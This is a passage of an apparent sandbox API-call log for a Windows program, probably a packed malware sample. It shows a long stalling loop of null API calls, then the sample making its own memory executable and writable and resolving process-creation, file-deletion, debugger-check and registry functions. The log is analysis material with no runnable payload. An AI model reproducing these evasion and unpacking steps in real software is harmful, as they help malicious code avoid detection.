lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.945] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.945] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.945] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.946] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.946] AddAtomA (lpString=0x0) returned 0x0 [0079.946] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.947] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.947] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.947] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.948] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.948] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.948] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.948] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.948] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.948] AddAtomA (lpString=0x0) returned 0x0 [0079.948] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.948] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.949] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.949] AddAtomA (lpString=0x0) returned 0x0 [0079.949] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.950] AddAtomA (lpString=0x0) returned 0x0 [0079.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.950] AddAtomA (lpString=0x0) returned 0x0 [0079.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.950] AddAtomA (lpString=0x0) returned 0x0 [0079.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.950] AddAtomA (lpString=0x0) returned 0x0 [0079.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.950] AddAtomA (lpString=0x0) returned 0x0 [0079.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.950] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.950] AddAtomA (lpString=0x0) returned 0x0 [0079.950] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.951] AddAtomA (lpString=0x0) returned 0x0 [0079.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.951] AddAtomA (lpString=0x0) returned 0x0 [0079.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.951] AddAtomA (lpString=0x0) returned 0x0 [0079.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.951] AddAtomA (lpString=0x0) returned 0x0 [0079.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.951] AddAtomA (lpString=0x0) returned 0x0 [0079.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.951] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.951] AddAtomA (lpString=0x0) returned 0x0 [0079.951] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.952] AddAtomA (lpString=0x0) returned 0x0 [0079.952] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.952] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.953] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.953] AddAtomA (lpString=0x0) returned 0x0 [0079.953] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.954] AddAtomA (lpString=0x0) returned 0x0 [0079.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.954] AddAtomA (lpString=0x0) returned 0x0 [0079.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.954] AddAtomA (lpString=0x0) returned 0x0 [0079.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.954] AddAtomA (lpString=0x0) returned 0x0 [0079.954] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.954] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.954] AddAtomA (lpString=0x0) returned 0x0 [0079.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.955] AddAtomA (lpString=0x0) returned 0x0 [0079.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.955] AddAtomA (lpString=0x0) returned 0x0 [0079.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.955] AddAtomA (lpString=0x0) returned 0x0 [0079.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.955] AddAtomA (lpString=0x0) returned 0x0 [0079.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0079.955] AddAtomA (lpString=0x0) returned 0x0 [0079.955] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0079.955] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.072] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0080.072] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0080.072] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0080.072] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0080.073] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0080.073] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0080.073] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0080.073] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0080.073] SetErrorMode (uMode=0x400) returned 0x0 [0080.073] SetErrorMode (uMode=0x0) returned 0x400 [0080.073] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0080.073] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0080.077] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0080.170] VirtualFree (lpAddress=0x390000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.171] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0080.171] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0080.171] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0080.171] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0080.171] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0080.172] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0080.173] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0080.174] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0080.175] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.176] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0080.177] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0080.178] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0080.179] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0080.179] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.179] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0080.179] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0080.179] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0080.179] GetProcAddress (hModule=0x754b0000, lpProcName="RegCreateKeyExW") returned 0x754c40fe [0080.179] GetProcAddress (hModule=0x754b0000, lpProcName="SetSecurityDescriptorDacl") returned 0x754c415e [0080.180] GetProcAddress (hModule=0x754b0000, 